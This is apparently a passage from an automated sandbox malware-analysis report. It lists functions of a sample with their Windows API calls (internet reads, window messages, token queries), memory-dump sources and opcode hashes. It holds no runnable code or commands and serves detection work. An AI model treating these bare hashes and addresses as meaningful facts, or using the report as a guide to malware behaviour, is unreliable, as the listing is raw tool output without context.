                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                      • String ID:
                                                                      • API String ID: 2256411358-0
                                                                      • Opcode ID: da763e26ff45596ba9024348c5c3258eb137c479d7cac242ef549afa7fed1385
                                                                      • Instruction ID: b1ad9e76f15b6cbb1bae3a2fe27ef1b05628a909e833fdad0823fbd6d5494f1f
                                                                      • Opcode Fuzzy Hash: da763e26ff45596ba9024348c5c3258eb137c479d7cac242ef549afa7fed1385
                                                                      • Instruction Fuzzy Hash: 5731B77260C342DFEF35CBB59859BB637E8EB05305F04456AF462C61A0E7F49686CB11
                                                                      Function 00A3CF1A Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,00A3C21E,00000000), ref: 00A3CF38
                                                                      • InternetReadFile.WININET(?,00000000,?,?), ref: 00A3CF6F
                                                                      • GetLastError.KERNEL32(?,00000000,?,?,?,00A3C21E,00000000), ref: 00A3CFB4
                                                                      • SetEvent.KERNEL32(?,?,00000000,?,?,?,00A3C21E,00000000), ref: 00A3CFC8
                                                                      • SetEvent.KERNEL32(?,?,00000000,?,?,?,00A3C21E,00000000), ref: 00A3CFF2
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                                                      • String ID:
                                                                      • API String ID: 3191363074-0
                                                                      • Opcode ID: 06cff7716df0fbae03e9e18151fb3259c71d3ec6f6d899ac8a262d00716d31a4
                                                                      • Instruction ID: 4b0772d5cd3456644c104b42703313ba41fcae406307ad7637a540e160741845
                                                                      • Opcode Fuzzy Hash: 06cff7716df0fbae03e9e18151fb3259c71d3ec6f6d899ac8a262d00716d31a4
                                                                      • Instruction Fuzzy Hash: E8314971600705AFDB20DFA5DD85AABBBF9EB14365F10842EF506E2241DB30AE41DB60
                                                                      Function 00A21901 Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetWindowRect.USER32(?,?), ref: 00A21915
                                                                      • PostMessageW.USER32(00000001,00000201,00000001), ref: 00A219C1
                                                                      • Sleep.KERNEL32(00000000,?,?,?), ref: 00A219C9
                                                                      • PostMessageW.USER32(00000001,00000202,00000000), ref: 00A219DA
                                                                      • Sleep.KERNEL32(00000000,?,?,?,?), ref: 00A219E2
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: MessagePostSleep$RectWindow
                                                                      • String ID:
                                                                      • API String ID: 3382505437-0
                                                                      • Opcode ID: e61db13ad1787f5d67b093dfd92c7138d4768ac0e725e0b2d66f964ff77bc17a
                                                                      • Instruction ID: 5487145b33f18cad9276a0fbb01517c0a8d2b442df8cd17b6d4dcfdc4a3b294c
                                                                      • Opcode Fuzzy Hash: e61db13ad1787f5d67b093dfd92c7138d4768ac0e725e0b2d66f964ff77bc17a
                                                                      • Instruction Fuzzy Hash: 7931BF71A00229EFCB04CFACDD99ADE7BB5FB14325F104229F921A72D1C7709A84CB90
                                                                      Function 00A55706 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00A55745
                                                                      • SendMessageW.USER32(?,00001074,?,00000001), ref: 00A5579D
                                                                      • _wcslen.LIBCMT ref: 00A557AF
                                                                      • _wcslen.LIBCMT ref: 00A557BA
                                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00A55816
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$_wcslen
                                                                      • String ID:
                                                                      • API String ID: 763830540-0
                                                                      • Opcode ID: 43d2a55e0d0fc0e46b80a93a71f4ffda6d741844076c41caa760f155ca5a24a1
                                                                      • Instruction ID: 98e2b1dcebe407ae30b72db8d2d04c76c83370d9113e4d86985f3d44e51ab09c
                                                                      • Opcode Fuzzy Hash: 43d2a55e0d0fc0e46b80a93a71f4ffda6d741844076c41caa760f155ca5a24a1
                                                                      • Instruction Fuzzy Hash: 74218271D04618DADB21DFB0CC85AEE77B8FF44726F108656ED29EA180D7748A89CF50
                                                                      Function 00A40930 Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • IsWindow.USER32(00000000), ref: 00A40951
                                                                      • GetForegroundWindow.USER32 ref: 00A40968
                                                                      • GetDC.USER32(00000000), ref: 00A409A4
                                                                      • GetPixel.GDI32(00000000,?,00000003), ref: 00A409B0
                                                                      • ReleaseDC.USER32(00000000,00000003), ref: 00A409E8
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Window$ForegroundPixelRelease
                                                                      • String ID:
                                                                      • API String ID: 4156661090-0
                                                                      • Opcode ID: 285ccd621b9be4f03413f4295fe3843fb89630ed1e23423e4442fbf6950bf69f
                                                                      • Instruction ID: 7022a4ff929deea5162ac21ac65ca696d21fdc96c4d3dbd03236cc60cd437a53
                                                                      • Opcode Fuzzy Hash: 285ccd621b9be4f03413f4295fe3843fb89630ed1e23423e4442fbf6950bf69f
                                                                      • Instruction Fuzzy Hash: FC219F35A00214AFD704EFA5D985EAEBBE5FF88711F00842CF84A97752CB30AD05CB50
                                                                      Function 009FCDBD Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetEnvironmentStringsW.KERNEL32 ref: 009FCDC6
                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 009FCDE9
                                                                        • Part of subcall function 009F3820: RtlAllocateHeap.NTDLL(00000000,?,00A91444,?,009DFDF5,?,?,009CA976,00000010,00A91440,009C13FC,?,009C13C6,?,009C1129), ref: 009F3852
                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 009FCE0F
                                                                      • _free.LIBCMT ref: 009FCE22
                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 009FCE31
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                      • String ID:
                                                                      • API String ID: 336800556-0
                                                                      • Opcode ID: bbda2f66f692eb43bea1d0e6e7db80f30dc853126a6eec4358bfbb081a29e8c9
                                                                      • Instruction ID: 040cd05a34e99ac3bae1d2f6e808f3ba92af7befb0a87a9f758ae341eaccc3db
                                                                      • Opcode Fuzzy Hash: bbda2f66f692eb43bea1d0e6e7db80f30dc853126a6eec4358bfbb081a29e8c9
                                                                      • Instruction Fuzzy Hash: 7101D4B2A0171D7F632156B66D88DBB6A6DEEC6BB13158129FA05C7200EA658D0283F0
                                                                      Function 009D9639 Relevance: 7.6, APIs: 5, Instructions: 66COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 009D9693
                                                                      • SelectObject.GDI32(?,00000000), ref: 009D96A2
                                                                      • BeginPath.GDI32(?), ref: 009D96B9
                                                                      • SelectObject.GDI32(?,00000000), ref: 009D96E2
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: ObjectSelect$BeginCreatePath
                                                                      • String ID:
                                                                      • API String ID: 3225163088-0
                                                                      • Opcode ID: 3e9e2d8fc9d37bb74f587d916399c8a5959998f331209b7bc86b24b1710a82f3
                                                                      • Instruction ID: 7957bea6bc8d93bdeb3d6a57df9eab904b47f7409c6f3c356a329506df99e378
                                                                      • Opcode Fuzzy Hash: 3e9e2d8fc9d37bb74f587d916399c8a5959998f331209b7bc86b24b1710a82f3
                                                                      • Instruction Fuzzy Hash: 02218030942306EFDF11EFA4DC087A93BB8BB50366F908217F420A62B0D7719892CB90
                                                                      Function 00A25711 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: _memcmp
                                                                      • String ID:
                                                                      • API String ID: 2931989736-0
                                                                      • Opcode ID: 0a9666d30618f61ea1105391208cbd040bef542d623d73af74e7da1da9816514
                                                                      • Instruction ID: 7cdac20190813c0d2afe6ee1a4c47158e8b2783ebb4f04a264476c221fbeeba0
                                                                      • Opcode Fuzzy Hash: 0a9666d30618f61ea1105391208cbd040bef542d623d73af74e7da1da9816514
                                                                      • Instruction Fuzzy Hash: 0D01B9B1A81655FFD2089625EE42FBB735CBF613A5F004830FD04AA241F770ED1482A0
                                                                      Function 009D990E Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetSysColor.USER32(00000008), ref: 009D98CC
                                                                      • SetTextColor.GDI32(?,?), ref: 009D98D6
                                                                      • SetBkMode.GDI32(?,00000001), ref: 009D98E9
                                                                      • GetStockObject.GDI32(00000005), ref: 009D98F1
                                                                      • GetWindowLongW.USER32(?,000000EB), ref: 009D9952
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Color$LongModeObjectStockTextWindow
                                                                      • String ID:
                                                                      • API String ID: 1860813098-0
                                                                      • Opcode ID: b1cc51f2d9b755c33fb33c281a585bcec0fbfa8f880cf83990b1d68850a1e892
                                                                      • Instruction ID: 71d55c456c673bd89aea936b5bfdfb2d0587010ec39902e5d71760fdc7d2a750
                                                                      • Opcode Fuzzy Hash: b1cc51f2d9b755c33fb33c281a585bcec0fbfa8f880cf83990b1d68850a1e892
                                                                      • Instruction Fuzzy Hash: 891138312853509FCB12DF64EC64FE93B34FF06766B04404BF5428B2A2CB314991CB50
                                                                      Function 009F2DF8 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetLastError.KERNEL32(?,?,?,009EF2DE,009F3863,00A91444,?,009DFDF5,?,?,009CA976,00000010,00A91440,009C13FC,?,009C13C6), ref: 009F2DFD
                                                                      • _free.LIBCMT ref: 009F2E32
                                                                      • _free.LIBCMT ref: 009F2E59
                                                                      • SetLastError.KERNEL32(00000000,009C1129), ref: 009F2E66
                                                                      • SetLastError.KERNEL32(00000000,009C1129), ref: 009F2E6F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$_free
                                                                      • String ID:
                                                                      • API String ID: 3170660625-0
                                                                      • Opcode ID: 8b466cbce3d101fa546740d91549318c3c0571f6b716124ea12ec8a38688d8c6
                                                                      • Instruction ID: ca7bc8dc73916f8c6f71bd1955becac5e2773d1a69f9565c10f4fe0155a5cbc7
                                                                      • Opcode Fuzzy Hash: 8b466cbce3d101fa546740d91549318c3c0571f6b716124ea12ec8a38688d8c6
                                                                      • Instruction Fuzzy Hash: F901F93224570C6BC61267B46C49F7B2A5DBBC17B57314525FB6597192EA748C024320
                                                                      Function 00A2000E Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00A1FF41,80070057,?,?,?,00A2035E), ref: 00A2002B
                                                                      • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00A1FF41,80070057,?,?), ref: 00A20046
                                                                      • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00A1FF41,80070057,?,?), ref: 00A20054
                                                                      • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00A1FF41,80070057,?), ref: 00A20064
                                                                      • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00A1FF41,80070057,?,?), ref: 00A20070
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                      • String ID:
                                                                      • API String ID: 3897988419-0
                                                                      • Opcode ID: ae497c8a8f67d9b93cc85013afe564264a3b459bd65fa5d4ed99cb45f8629bde
                                                                      • Instruction ID: c241be6918a558443f9ed939db730794fb0b92a9871ec6337d62bdc54ead7584
                                                                      • Opcode Fuzzy Hash: ae497c8a8f67d9b93cc85013afe564264a3b459bd65fa5d4ed99cb45f8629bde
                                                                      • Instruction Fuzzy Hash: 10018B72600324BFEB108FACEC44FAA7AADEB447A2F144134F905D6225E771DD418BA0
                                                                      Function 00A2E97B Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 00A2E997
                                                                      • QueryPerformanceFrequency.KERNEL32(?), ref: 00A2E9A5
                                                                      • Sleep.KERNEL32(00000000), ref: 00A2E9AD
                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 00A2E9B7
                                                                      • Sleep.KERNEL32 ref: 00A2E9F3
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                      • String ID:
                                                                      • API String ID: 2833360925-0
                                                                      • Opcode ID: de8407ed6980b2d84e3b5589eebfead668d1672c5dd5eedee2d2adfac540e8a9
                                                                      • Instruction ID: 2c0350bc327b8f73bbef4b24145c586dd8b8df7db650fed949b5fa1ad3da3301
                                                                      • Opcode Fuzzy Hash: de8407ed6980b2d84e3b5589eebfead668d1672c5dd5eedee2d2adfac540e8a9
                                                                      • Instruction Fuzzy Hash: CC010931C01639DBCF00EBE9ED59ADDFB78BB09711F000666E502B2245CB34959587A1
                                                                      Function 00A210F9 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00A21114
                                                                      • GetLastError.KERNEL32(?,00000000,00000000,?,?,00A20B9B,?,?,?), ref: 00A21120
                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00A20B9B,?,?,?), ref: 00A2112F
                                                                      • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00A20B9B,?,?,?), ref: 00A21136
                                                                      • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00A2114D
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                      • String ID:
                                                                      • API String ID: 842720411-0
                                                                      • Opcode ID: 2594a7693ffa52ea4bccbfc5b67656e2c340a52f29fd7b0997393cc36e0ef6c7
                                                                      • Instruction ID: 6e515fb5424936b81d358cb18b40ee1ae936f1db338c2fca2d00907e7d0a9a00
                                                                      • Opcode Fuzzy Hash: 2594a7693ffa52ea4bccbfc5b67656e2c340a52f29fd7b0997393cc36e0ef6c7
                                                                      • Instruction Fuzzy Hash: FA016D75100315BFDB118FA8EC49A6A3F6EFF89375B100428FA41D7350DA31DC11CA60
                                                                      Function 00A20FB4 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00A20FCA
                                                                      • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00A20FD6
                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00A20FE5
                                                                      • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00A20FEC
                                                                      • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00A21002
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                      • String ID:
                                                                      • API String ID: 44706859-0
                                                                      • Opcode ID: 4905f64eabc9217c8ed275ff0dfcd0e7a83315d3e0a8bfb18bd9dd802a2b8dd1
                                                                      • Instruction ID: 4aee6cef52e97ffba69e3028a090a67321a89e2adae678af66082e45bad88e0b
                                                                      • Opcode Fuzzy Hash: 4905f64eabc9217c8ed275ff0dfcd0e7a83315d3e0a8bfb18bd9dd802a2b8dd1
                                                                      • Instruction Fuzzy Hash: 88F04935200315AFDB218FA9AC49F5A3BADFF89762F104424FA46C6291CA70DC818A60
                                                                      Function 00A21014 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00A2102A
                                                                      • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00A21036
                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00A21045
                                                                      • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00A2104C
                                                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00A21062
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                      • String ID:
                                                                      • API String ID: 44706859-0
                                                                      • Opcode ID: a566e628d15d211f6cd193854a2475b316dddb92354c87847668c6cd61ed4d13
                                                                      • Instruction ID: 91e5ac3fa5581f4ca69fc7f9c423e51bbb9a96c626239b1374eb99431305d2cd
                                                                      • Opcode Fuzzy Hash: a566e628d15d211f6cd193854a2475b316dddb92354c87847668c6cd61ed4d13
                                                                      • Instruction Fuzzy Hash: F2F04935200355AFDB219FA9EC49F5A3BADFF89762F500424FA46C6290CA70D8818A60
